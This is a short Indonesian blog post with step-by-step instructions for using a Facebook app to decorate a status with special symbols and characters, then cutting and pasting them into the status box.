1. Login terlebih dahulu ke facebook anda.

2. Buka aplikasi ini :

http://apps.facebook.com/statussymbols/

3. Klik Izinkan.


4. Pilihlah beberapa kode atau character2 menarik untuk memperindah status facebook anda dengan cara meng-klik tombol kode/character tersebut.

5. Kalau sudah selesai memilih. Blok semua tulisan+kode anda, caranya tekan Ctrl+A lalu Ctrl+X.

6. Setelah itu pindahkan ke status facebook anda, caranya : taruh pointer di kotak pengisian status, terus tekan Ctrl+V.

Mudahkan ^_^
cara membuat status facebook lebih menarik
sumber : id-facebook.blogspot.com
»»  READMORE...